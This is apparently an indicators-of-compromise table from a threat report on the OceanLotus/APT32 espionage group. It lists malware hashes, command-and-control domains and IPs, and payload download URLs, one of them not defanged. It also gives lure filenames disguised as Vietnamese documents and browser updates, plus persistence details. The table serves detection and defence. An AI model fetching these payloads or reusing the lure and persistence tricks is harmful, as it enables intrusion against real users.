FirefoxInstaller.exe, 7zS.sfx.exe EXE Denis 1673728 11/16/11 9:54 9/28/17 12:23 34ae9148a4db9993110e4fe4a0f8e9db17790b036ea0f5c236f53cbf845dd2a3 http[:]//103.53.197[.]172/Firefox%20Setup%20Stub.exe tsworthoa.com (23.227.201.220), Tsworthoa. 
Drops Salgorea DLL (loader) and ----- **yp** **p** **p** 1fa011e6a692ee95452c626e61b5263a 198e3c9e6f3dbcf586ac90486187ebfffdeb1c5d663131fc60c45451b04cce7a 6 Firefox Setup Stub.exe, 7zS.sfx.exe EXE Denis 1907712 11/16/11 9:54 9/15/17 16:44 30d6a4b9c41225c22b3d1bf2f1eab3d1c57c8b1a69502eab076a4f97f14023ac urnage.com (173.209.43.20) Drops Salgorea DLL (loader) and SyLog.bin (encrypted backdoor) 627e3ff5659b9a0ab9dc4b283c3288dd 5091430fac8b608ac612c35a1e29ce47cdeb22429657460dddc660727806b511 6 WinWord.exe, Chi tiet noi dung bai EXE Denis 2033152 10/14/09 22:21 8/6/17 20:13 08744b41169f163d1fde59f98f4702cef46632a50b7c2bcbda60ae6626170a3b arinaurna.com (74.121.190.150) Drops Salgorea DLL (loader) and viet dang len bao.docx.exe SyLog.bin (encrypted backdoor) d592b06f9d112c8650091166c19ea05a a17d4568ad5f745d36fc17846d3e0edf63d4e3c9fccb9861579e957f7a560217 6, 7 WinWord.exe, rastlsc.exe, Chi tiet danh sach EXE Denis 1503232 11/16/11 9:54 9/13/17 3:50 26529af7782a902c04ae01898c8b14c9f01302165335858ad666b10532584254 icmannaws.com (23.227.201.220), Icmannaws. Drops Salgorea DLL (loader) and nhan vien sai quy dinh can xu phat.exe com, Avidsontre.com, Lbertussbau.com SyLog.bin (encrypted backdoor) 88152846c45924d5706a11523942c82b 8f00c2dab8cc32e0052b7779de0bdc8faa385e890415555e86efdfc3b01cc504 6, 7 20170905-Evaluation Table.xls.exe EXE Denis 1719808 11/16/11 9:54 9/8/17 9:11 0528e2fa94f3b1253fe6c6a53452364568767253954630ab5cc141e41690ea43 http://cdn-download01.s3.amazonaws.com/07b3aa08-86-842a-48b1-8e57-383d56a0d2e9/FirefoxUpdate.exe aulolloy.com (46.183.223.107) Drops Salgorea DLL (loader) and SyLog.bin (encrypted backdoor) 05bc07fc6265e6affa8478118c02942a 890e5bd2650399d7fc3b543e8d1e65c0385f4d6003186245c8574c1913ca5d64 6 FirefoxUpdate.exe, 7zS.sfx.exe EXE Denis 1673728 11/16/11 9:54 9/27/17 9:53 6b560e2fc0be10d0ffd9e5440101f083ed7f5328735df79fd6c537c61bfcfe88 arinaurna.com (74.121.190.150), Arinaurna. 
Drops Salgorea DLL (loader) and com, Avidilleneu.com, Oftonlos.com SyLog.bin (encrypted backdoor) 75a9d759678834ade92e6ed8c6de569 30d06e100215461ad1c5b3bdb7a3b65c61f0ad27ebd733c7a37f40bd4b64932e 6 WinWord.exe EXE Denis 1729024 11/16/11 9:54 9/21/17 12:33 7477db2fab4dc77213008682e3302d6dd30e3963885f0a156d14bd067fa5b5cc tephens.com (74.121.190.150) Drops Salgorea DLL (loader) and SyLog.bin (encrypted backdoor) a7f98d3b7b7e2a7d1c194c2f26045618 c24e6d402a5adf1ece2d6a3dbe270e0904d43119d68e7862555505825a273cad 6 FontExt.dll EXE Denis 1500672 11/16/11 9:54 10/5/17 4:54 a40741b588147021ec0e9908857a2938f1d9bab73ebde18d2ea77feac053b1dc traveroyce.com (198.50.234.111) Drops Salgorea DLL (loader) and SyLog.bin (encrypted backdoor) 96b971c9ac868c8d9ae98618b9a9bddc 4ab2df974e5e563f611d7267916a00c18f819f5b8770ffcfadc5e1959047fb8e 6, 7 FontExt.dll, rastlsc.exe, RobototFontUpdate EXE Denis 1573376 11/16/11 9:54 10/5/17 10:38 06dec0082eac094dc0b4b3de8854f190f1d3112dada0d414d9a085a0ee309199 dwarduong.com (46.183.220.82), Erstin.com d95bbf9645994e891f3a8156eee9cbee d7549b1ddd668c5706b680654b2c39b6e401c55ecf25d0c4b1bff6468426e7ed 6 WinWord.exe, Thu moi tham du hoi nghi.doc.exe EXE Denis 1290752 11/16/11 9:54 9/8/17 10:55 chinanetworkvub.info ba844b09524aea077f6a175da10a6bf0 7c2b7593bcabdb253ebcf4905367d6760f53ac118edb70a305502ef11a63ec12 4 myvtfile.exe DOC Downloader 38912 7/14/17 7:03 a70e7d11fb221210b50691d2904712313bc94370dd7893bf1bf4501018a112a9, http[:]//lawph[.]info/download/images/user.gif 16fdb8f388f5a8737130d952f752fc9201ffde8549ae583c7582ab01147d171d fa6d09f010f11351a92c409fef7ba263 b6242d27c437a44b670c7a9a8a6bd2a92f6c4d66615310fadad146605d73e600 4 myfile.exe DOC Downloader 38912 5/23/17 10:09 9d57ce4d1578fe7b3651a98b41a62888a1b228d6152acfd3b5c3e0b4c81c77ad, http[:]//lawph[.]info/download/images/user.gif 82369d8e376beb0c26d93e16f9794139163ce14e394d113a84a40f96bcde0cbb 406dbee627ad8777d28ae2234a9e7c68 6b2a24e2818efff0e4571ae24f1aaffb9745c8b1426bfa57e6a7c067a7a074f8 4 Result 
Voting.xls DOC Downloader 105984 4/13/17 3:25 msofficecloud.org 5475d81ce3b3e018c33fbc83bdc0aa68 a87a14347dfa87128a5e5eb85067dbb6aac9d28484c08923c55c36ab1a3a99fa 4 myvtfile.exe DOC Downloader 38912 7/14/17 7:03 54bb003b233a2249bcd3f79fd8406727 e13cd452c0d9b8fa1a6f3a3b8722e35870efa0bec90bedf4eb757a9fe4c0c27b 4 HD_me_infect.doc DOC Downloader 130048 4/13/17 3:23 http[:]//chinanetworkvub[.]info/global/asian.jpg Blog.panggin.org, yii.yiihao126.net port numbers used: 443, 27408, 80, 40005 heavily obfuscated 90c3b5bcb26d83b34a81b302787933ba a70e7d11fb221210b50691d2904712313bc94370dd7893bf1bf4501018a112a9 4 asian.jpg, 10007.vbs PS1 + EXE Salgorea (Symc) 1826566 10/21/05 6:27 4/5/17 9:17 7c2b7593bcabdb253ebcf4905367d6760f53ac118edb70a305502ef11a63ec12 5458a2e4d784abb1a1127263bd5006b5 c161134bf3330c82eb0278fe54b2975c26301bdfdc4fc35d5344f9becf5574c7 2 2017 Statistical Report on Staff MIME/ Downloader 212546 3/2/17 7:01 Salary and Allowances.doc DOC/VBA ce50e544430e7265a45fab5a1f31e529 1210384a9d0ca2e089efab14f2e9f6d55a3824031c1e589b96f854fb96411288 2 Thong tin.doc MIME/ Downloader 79639 1/17/17 10:21 DOC/VBA 4f761095ca51bfbbf4496a4964e41d4f d0a725ee4602cd90493103648e6ec453b7987a016c19cff5c79cc42f4510e92f 2 Phan Vu Tutn CV.doc MIME/ Downloader 655017 10/10/16 17:05 DOC/VBA e9abe54162ba4572c770ab043f576784 1eca9dfd04fd5272a656d6e6d41c9ccc21a2700a979addf612a4de3b071253f5 2 Ke hoach cuu tro nam 2017.doc MIME/ Downloader 114686 3/1/17 3:55 DOC/VBA fba089444c769700e47c6b44c362f96b 703af242be581aa4c4c73b08ae57caf7c5d90f09f0991a963e07d02fb4209f75 2 Instructions to GSIS.doc MIME/ Downloader 160291 2/21/17 6:51 DOC/VBA f6ee4b72d6d42d0c7be9172be2b817c1 84d9af7b24ce85c3e5d97236c8562fcd45d34d99b07412fbdaca697c5961723e 2 Hoi thao truyen thong doc lap.doc MIME/ Downloader 656091 2/17/17 0:51 DOC/VBA aa1f85de3e4d33f31b4f78968b29f175 8c355092c7aaadb11748fd87ce528d3cdb483104e979d9b560af840eb8089f94 2 Gi�y yêu c�u b�i th��ng m�i 2016 - H�ng.doc MIME/ Downloader 239300 8/31/16 2:50 DOC/VBA 
5180a8d9325a417f2d8066f9226a5154 fadb91606e09b86c39aad99b452525217563594dc9c610120860a38439adb243 2 Hoa don chi tiet tien no.doc MIME/ Downloader 81305 2/25/17 18:44 DOC/VBA f6ee4b72d6d42d0c7be9172be2b817c1 84d9af7b24ce85c3e5d97236c8562fcd45d34d99b07412fbdaca697c5961723e 2 Thu moi tham du Hoi luan.doc MIME/ Downloader 656091 2/17/17 0:51 DOC/VBA 6baafffa7bf960dec821b627f9653e44 1fc1bc4d004ab51398070d8e3025fecf8878229cda8befdbc9a2faf592b8d876 2 Danh sach nhan vien lam viec sai quy dinh.doc MIME/ Downloader 80047 9/6/16 10:20 DOC/VBA 471a2e7341f2614b715dc89e803ffcac 209c52bc39e8fa3df3d4d12a4d1913f3751582b34898adf966dd227cd5a0c99a 2 N�i-dung-qu�ng-cáo.doc MIME/ Downloader 228268 3/16/17 15:38 DOC/VBA f1af6bb36cdf3cff768faee7919f0733 453168b12bdc881bd6763fbc456620fd42efe6a718c6aecb2fa4982a44207999 2 HĐ DVPM-VTC 31.03.17.doc MIME/ Downloader 169965 4/3/17 9:21 kiifd.pozon7.net, pad.werzo.net, shop.ownpro.net DOC/VBA 9831a7bfcf595351206a2ea5679fa65e 12f941f43b5aba416cbccabf71bce2488a7e642b90a3a1cb0e4c75525abb2888 1 FlashUpdate.app Mach-O MacOS backdoor 38324 9/28/15 9:26 d802aa9938e87dc33cf2c7a07e920b0b 07154b7a45937f2f5a2cda5b701504b179d0304fc653edb2d0672f54796c35f7 3 Noi dung chi tiet Mach-O MacOS backdoor 96708 8/16/16 10:01 025faee9578c97fbaa0da61d55691758 5c0cda1f5f7e69ec3d2b9c6c129f3b0509af84ff6e6f4b18b401f37777096027 9 WinWord.exe EXE CobaltStrike 157184 3/13/17 7:16 3/24/17 9:31 dc1e8e868c347d310f24235eb4391559 8f667d56778a2c1d68fc33be1870ea0c5fda7173c8875eddb31a2a4a3b406f55 9 tx32.dll DLL CobaltStrike 310272 5/17/16 1:12 8/15/16 4:04 e2e4b2f28d29fd19bb28287a4d99ede2 9afd2ccb1e2c434d296a6fa54fa5425c827e4172947c05a7db226076996a3715 9 Flash.exe EXE CobaltStrike 313856 11/4/16 10:25 12/28/16 9:51 ac8b9e5c35e134da9ec701bcd9bcf760 e19fc649fe55d73eff5b1e3f7180d777fbc5d481855f0b4e8eb0b78a25212353 9 Flash.exe EXE CobaltStrike 313856 11/4/16 10:25 1/18/17 19:00 detected by Symc as Backdoor.Komprogo 05fb8bb25d02c96d17e8a4564f255252 
d96f269b27138c282bd43beeb15f9f8ced006d2359ef43a79b98e3900e4f3a5e VT icons.exe, MsoCache.exe EXE Komprogo 507392 2/6/07 22:53 8/30/17 2:59 z.nsquery.net, z.tonholding.com Creates Mutex (8633f77ce68d3a4ce13b3654701d2daf_%USERNAME%) (Symc) 5394b09cf2a0b3d1caaecc46c0e502e3 087ef9f7ce4681d49c6fa8842785fedef21461f160a34fc37c75fed26ddfa91e 8 SndVolSSO.exe EXE Denis 198512 12/1/15 9:25 8/1/16 9:03 z.nsquery.net, z.tonholding.com Creates Mutex (8633f77ce68d3a4ce13b3654701d2daf_%USERNAME%) ----- **yp** **p** **p** 95a85454593426d42e45d11959801d58 10b09f64d75d748726a9b6a8880c6cd3cf8bcdb55c6b52e9a65940b27894f8e5 VT SndVolSSO.exe EXE Denis 198512 12/16/15 9:29 12/22/17 1:50 z.nsquery.net, z.tonholding.com, z.gl- Creates Mutex (8633f77ce68d3a4ce13b3654701d2daf_%USERNAME%) appspot.org, z.facebook-cdn.net facec411b6d6aa23ff80d1366633ea7a 155b13e582adeab564c60a1091b4dccc43ed78db290aa3e2da7e8bc1e039770c 8 mdnsNSP.exe EXE Denis 178688 12/26/13 12:19 3/10/17 22:48 z.vieweva.com, z.notificeva.com, Creates service (UPnP Device Hostz/upnphostz) c:\Program Files\ z.tulationeva.com, z.teriava.com CMAK\Support\en-US\msprivs.exe /k wcssvc 27ac632a3a270900986d7afef67317a2 699eb46678331ec02318bfcab291125ed707e6ab2b68ca18a5680fcd850c12f6 9 msprivs.exe EXE Denis 190464 8/18/12 19:12 3/10/17 8:55 z.tonholding.com, z.nsquery.net Creates service (Windows Color System/ WcsPlugInService) C:\Windows\xwizard.exe \k wcssvc 02b2d905a72c4bb2abfc278b8ca7f722 7f38efc01d7388df1a00500b5e9c857e47501066b49a8fcb8324378daab32d1e 9 xwizard.exe, KB12345678.exe EXE Denis 231936 12/1/15 9:25 8/1/16 9:07 z.facebook-cdn.net, z.nsquery.net, Creates Mutex (8633f77ce68d3a4ce13b3654701d2daf_%USERNAME%) z.tonholding.com, z.gl-appspot.org cf8d4728a093ce412d0477a2eadc2955 808a06b2726c642449d53dc01080a61bef3851eab9e0a99e44e3bbd19a74b63a 9 SwUSB.exe EXE Denis 179200 4/26/12 20:04 8/30/16 6:59 ns1.clearddns.com, search.ultraqueryns.biz Creates service (Microsoft .NET Framework NGEN v2.0.50725_X86/ clr_optimization_v2.0.50725_86) 
**Source References**

Cy: Cylance
VT: VirusTotal

1. http://www.freebuf.com/news/topnews/68622.html
2. https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html
3. https://researchcenter.paloaltonetworks.com/2017/06/unit42-new-improved-macos-backdoor-oceanlotus/
4. https://mp.weixin.qq.com/s?__biz=MzI5NjA0NjI5MQ%3D%3D&idx=1&mid=2650164408&sn=a5abc26a34f4f21c20619146686670bf
5. http://www.freebuf.com/articles/network/146552.html
6. https://mp.weixin.qq.com/s/UIV0YaIlSJLcYT32XJQPlg
7. https://www.welivesecurity.com/wp-content/uploads/2018/03/ESET_OceanLotus.pdf
8. https://securelist.com/use-of-dns-tunneling-for-cc-communications/78203/
9. https://www2.cybereason.com/asset/61:research-cobalt-kitty-profile-iocs
10. http://www.freebuf.com/articles/others-articles/153666.html